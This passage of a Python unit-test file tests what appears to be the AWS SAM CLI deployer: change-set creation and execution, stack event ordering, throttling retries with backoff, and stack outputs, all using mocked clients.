"check http://docs.aws.amazon.com/AmazonS3/latest/API/ErrorResponses.html"
)
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": error_message}}, operation_name="create_changeset"
)
)
with self.assertRaises(DeployBucketInDifferentRegionError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_ClientErrorException_generic(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Message"}}, operation_name="create_changeset")
)
with self.assertRaises(ChangeSetError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_pass_through_optional_arguments_only_if_having_values(self):
self.deployer.has_stack = MagicMock(return_value=False)
# assert that the arguments Capabilities, RoleARN & NotificationARNs are passed through when they have values
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
RoleARN="role-arn",
NotificationARNs=[],
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
# assert that the arguments Capabilities, RoleARN & NotificationARNs are not passed through when they have no values
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=None,
role_arn=None,
notification_arns=None,
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.deployer._client.create_change_set.assert_called_with(
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_describe_changeset_with_changes(self):
response = [
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id1", "ResourceType": "s3", "Action": "Add"}}
]
},
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id2", "ResourceType": "kms", "Action": "Add"}}
]
},
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id3", "ResourceType": "lambda", "Action": "Add"}}
]
},
]
self.deployer._client.get_paginator = MagicMock(return_value=MockPaginator(resp=response))
changes = self.deployer.describe_changeset("change_id", "test")
self.assertEqual(
changes,
{
"Add": [
{"LogicalResourceId": "resource_id1", "ResourceType": "s3", "Replacement": "N/A"},
{"LogicalResourceId": "resource_id2", "ResourceType": "kms", "Replacement": "N/A"},
{"LogicalResourceId": "resource_id3", "ResourceType": "lambda", "Replacement": "N/A"},
],
"Modify": [],
"Remove": [],
},
)
def test_describe_changeset_with_no_changes(self):
response = [{"Changes": []}]
self.deployer._client.get_paginator = MagicMock(return_value=MockPaginator(resp=response))
changes = self.deployer.describe_changeset("change_id", "test")
self.assertEqual(changes, {"Add": [], "Modify": [], "Remove": []})
def test_wait_for_changeset(self):
self.deployer._client.get_waiter = MagicMock(return_value=MockChangesetWaiter())
self.deployer.wait_for_changeset("test-id", "test-stack")
def test_wait_for_changeset_exception_ChangeEmpty(self):
self.deployer._client.get_waiter = MagicMock(
return_value=MockChangesetWaiter(
ex=WaiterError(
name="wait_for_changeset",
reason="unit-test",
last_response={"Status": "Failed", "StatusReason": "It's a unit test"},
)
)
)
with self.assertRaises(ChangeSetError):
self.deployer.wait_for_changeset("test-id", "test-stack")
def test_execute_changeset(self):
self.deployer.execute_changeset("id", "test", True)
self.deployer._client.execute_change_set.assert_called_with(
ChangeSetName="id", StackName="test", DisableRollback=True
)
def test_execute_changeset_exception(self):
self.deployer._client.execute_change_set = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Error"}}, operation_name="execute_changeset")
)
with self.assertRaises(DeployFailedError):
self.deployer.execute_changeset("id", "test", True)
def test_get_last_event_time(self):
timestamp = datetime.utcnow()
self.deployer._client.describe_stack_events = MagicMock(
return_value={"StackEvents": [{"Timestamp": timestamp}]}
)
self.assertEqual(self.deployer.get_last_event_time("test"), utc_to_timestamp(timestamp))
def test_get_last_event_time_unknown_last_time(self):
current_timestamp = datetime.utcnow()
self.deployer._client.describe_stack_events = MagicMock(side_effect=KeyError)
# Convert to milliseconds from seconds
last_stack_event_timestamp = to_datetime(self.deployer.get_last_event_time("test") * 1000)
self.assertEqual(last_stack_event_timestamp.year, current_timestamp.year)
self.assertEqual(last_stack_event_timestamp.month, current_timestamp.month)
self.assertEqual(last_stack_event_timestamp.day, current_timestamp.day)
self.assertEqual(last_stack_event_timestamp.hour, current_timestamp.hour)
self.assertEqual(last_stack_event_timestamp.minute, current_timestamp.minute)
self.assertEqual(last_stack_event_timestamp.second, current_timestamp.second)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_chronological_order(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=2),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_pprint_columns.call_count, 5)
self.assertListSubset(
["CREATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["CREATE_IN_PROGRESS", "kms", "mykms"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[2][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "kms", "mykms"], patched_pprint_columns.call_args_list[3][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[4][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_chronological_order_with_previous_event(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
last_event_timestamp = start_timestamp - timedelta(hours=6)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "UPDATE_COMPLETE",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=2),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
# Last event (from a former deployment)
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(last_event_timestamp))
self.assertEqual(patched_pprint_columns.call_count, 5)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "kms", "mykms"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[2][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "kms", "mykms"], patched_pprint_columns.call_args_list[3][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[4][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_skip_old_event(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
last_event_timestamp = start_timestamp - timedelta(hours=6)
sample_events = [
# old deployment
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp - timedelta(seconds=10),
"ResourceStatus": "CREATE_IN_PROGRESS",
}
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
# new deployment
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=10),
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=20),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=30),
"ResourceStatus": "UPDATE_COMPLETE",
}
]
},
]
invalid_event = {"StackEvents": [{}]} # if deployer() loop read this, KeyError would raise
self.deployer._client.get_paginator = MagicMock(
side_effect=[
MockPaginator([sample_events[0], invalid_event]),
MockPaginator([sample_events[1], sample_events[0], invalid_event]),
MockPaginator([sample_events[2], sample_events[1], invalid_event]),
MockPaginator([sample_events[3], sample_events[2], invalid_event]),
MockPaginator([sample_events[4], sample_events[3], invalid_event]),
MockPaginator([sample_events[5], sample_events[4], invalid_event]),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(last_event_timestamp))
self.assertEqual(patched_pprint_columns.call_count, 4)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[0][1]["columns"],
)
self.assertListSubset(
["UPDATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[3][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_stop_at_first_not_in_progress(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=33),
"ResourceStatus": "UPDATE_COMLPETE",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=32),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=31),
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=30),
"ResourceStatus": "UPDATE_IN_PROGRESS",
},
{
# This event should stop the loop, so the newer events above are ignored
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "CREATE_COMPLETE",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_pprint_columns.call_count, 3)
self.assertListSubset(
["CREATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[2][1]["columns"],
)
@patch("samcli.lib.deploy.deployer.math")
@patch("time.sleep")
def test_describe_stack_events_exceptions(self, patched_time, patched_math):
self.deployer._client.get_paginator = MagicMock(
side_effect=[
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
]
)
# No exception is raised; we return with a log message because the changeset is
# still being executed and only the display of its events is being throttled.
self.deployer.describe_stack_events("test", time.time())
self.assertEqual(patched_math.pow.call_count, 3)
self.assertEqual(patched_math.pow.call_args_list, [call(2, 1), call(2, 2), call(2, 3)])
@patch("samcli.lib.deploy.deployer.math")
@patch("time.sleep")
def test_describe_stack_events_resume_after_exceptions(self, patched_time, patched_math):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
side_effect=[
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
},
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_math.pow.call_count, 3)
self.assertEqual(patched_math.pow.call_args_list, [call(2, 1), call(2, 2), call(2, 3)])
@patch("samcli.lib.deploy.deployer.math.pow", wraps=math.pow)
@patch("time.sleep")
def test_describe_stack_events_reset_retry_on_success_after_exceptions(self, patched_time, patched_pow):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
side_effect=[
MockPaginator(
[
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
]
},
]
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=10),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=20),
"ResourceStatus": "CREATE_COMPLETE",
},
]
},
]
),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
# There are 2 sleep calls for exceptions (backoff + a regular one at 0)
self.assertEqual(patched_time.call_count, 9)
self.assertEqual(
patched_time.call_args_list,
[call(0.5), call(0.5), call(2.0), call(0), call(4.0), call(0), call(0.5), call(2.0), call(0)],
)
self.assertEqual(patched_pow.call_count, 3)
self.assertEqual(patched_pow.call_args_list, [call(2, 1), call(2, 2), call(2, 1)])
def test_check_stack_status(self):
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("REVIEW_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("ROLLBACK_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("ROLLBACK_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_COMPLETE_CLEANUP_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_IN_PROGRESS"), False)
self.assertEqual(
self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS"), False
)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_IN_PROGRESS"), False)
@patch("time.sleep")
def test_wait_for_execute(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer.wait_for_execute("test", "CREATE", False)
self.deployer.wait_for_execute("test", "UPDATE", True)
with self.assertRaises(RuntimeError):
self.deployer.wait_for_execute("test", "DESTRUCT", False)
self.deployer._client.get_waiter = MagicMock(
return_value=MockCreateUpdateWaiter(
ex=WaiterError(
name="create_changeset",
reason="unit-test",
last_response={"Status": "Failed", "StatusReason": "It's a unit test"},
)
)
)
with self.assertRaises(DeployFailedError):
self.deployer.wait_for_execute("test", "CREATE", False)
def test_create_and_wait_for_changeset(self):
self.deployer.create_changeset = MagicMock(return_value=({"Id": "test"}, "create"))
self.deployer.wait_for_changeset = MagicMock()
self.deployer.describe_changeset = MagicMock()
result = self.deployer.create_and_wait_for_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(result, ({"Id": "test"}, "create"))
def test_create_and_wait_for_changeset_exception(self):
self.deployer.create_changeset = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": "Something Wrong"}}, operation_name="create_changeset"
)
)
with self.assertRaises(DeployFailedError):
self.deployer.create_and_wait_for_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_get_stack_outputs(self):
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(outputs["Stacks"][0]["Outputs"], self.deployer.get_stack_outputs(stack_name="test"))
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_get_stack_outputs_no_echo(self, mock_pprint_columns):
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(
outputs["Stacks"][0]["Outputs"], self.deployer.get_stack_outputs(stack_name="test", echo=False)
)
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
self.assertEqual(mock_pprint_columns.call_count, 0)
def test_get_stack_outputs_no_outputs_no_exception(self):
outputs = {"Stacks": [{"SomeOtherKey": "Value"}]}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(None, self.deployer.get_stack_outputs(stack_name="test"))
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
def test_get_stack_outputs_exception(self):
self.deployer._client.describe_stacks = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Error"}}, operation_name="describe_stacks")
)
with self.assertRaises(DeployStackOutPutFailedError):
self.deployer.get_stack_outputs(stack_name="test")
@patch("time.sleep")
def test_wait_for_execute_no_outputs(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer._display_stack_outputs = MagicMock()
self.deployer.get_stack_outputs = MagicMock(return_value=None)
self.deployer.wait_for_execute("test", "CREATE", False)
self.assertEqual(self.deployer._display_stack_outputs.call_count, 0)
@patch("time.sleep")
def test_wait_for_execute_with_outputs(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer._display_stack_outputs = MagicMock()
self.deployer.get_stack_outputs = MagicMock(return_value=outputs["Stacks"][0]["Outputs"])
self.deployer.wait_for_execute("test", "CREATE", False)
self.assertEqual(self.deployer._display_stack_outputs.call_count, 1)
def test_sync_update_stack(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.wait_for_execute = MagicMock()
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.update_stack.call_count, 1)
self.deployer._client.update_stack.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_sync_update_stack_exception(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.wait_for_execute = MagicMock()
self.deployer._client.update_stack = MagicMock(side_effect=Exception)
with self.assertRaises(DeployFailedError):
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_sync_create_stack(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.wait_for_execute = MagicMock()
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
